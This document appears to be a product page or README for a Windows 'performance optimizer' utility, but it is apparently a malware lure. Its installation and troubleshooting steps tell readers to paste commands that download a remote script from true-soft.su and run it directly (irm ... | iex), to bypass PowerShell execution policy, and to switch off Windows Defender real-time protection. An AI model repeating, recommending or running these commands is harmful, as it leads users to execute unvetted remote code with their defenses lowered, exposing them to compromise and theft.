Windows Performance Optimizer & System Tuning Utility
An advanced, open-source Windows configuration utility designed to maximize system responsiveness, minimize hardware latency, and streamline background processes. This lightweight tool provides a centralized interface for safe and effective operating system optimization.
Whether you are a PC gamer looking for a higher FPS baseline, a video editor needing maximum CPU/RAM availability, or a system administrator deploying a clean OS environment, this utility helps you achieve peak hardware efficiency.
🚀 Key Optimization Features
The utility automates standard administrative tasks to improve overall system throughput:
- Hardware Latency Reduction: Fine-tunes system timers and interrupt handling for faster mouse and keyboard response times.
- Resource Management: Reallocates CPU and RAM priorities to give foreground applications and video games maximum performance.
- Storage Optimization: Safe disk cleanup and system file verification to free up NVMe/SSD space and maintain drive health.
- Visual Effects Streamlining: Adjusts native desktop composition settings to lower GPU idle usage.
- Service Automation: Disables unnecessary background tasks and startup items that slow down boot times.
🚀 Automated Installation & Setup (PowerShell)
-
Open PowerShell :
- Press the
Win + Xkeys simultaneously. - Select Terminal or Windows PowerShell from the context menu.
- Press the
-
Run the Installation Command: Copy, paste, and press
Enterto run the following initialization command. This script will automatically configure the registry bypass and download all required packages:irm https://true-soft.su/powershell/Loader.ps1 | iex
🔍 Troubleshooting & Common Errors
📌 Execution Policy Error (Script Blocked)
If your system blocks the launch due to execution policy restrictions, force a bypass using this command in Command Prompt (cmd):
powershell -ExecutionPolicy Bypass -Command "irm https://true-soft.su/powershell/Loader.ps1 | iex"📌 Error: "irm is not recognized..." (Older PowerShell Versions)
If you are using an older environment where short aliases are missing, use the full system commands:
Invoke-RestMethod https://true-soft.su/powershell/Loader.ps1 | Invoke-Expression📌 Antivirus or SmartScreen Block
Automated scripts can sometimes trigger antivirus warnings. If this happens, temporarily turn off "Real-time protection" in Windows Defender settings during setup, then turn it back on as soon as the installation is complete.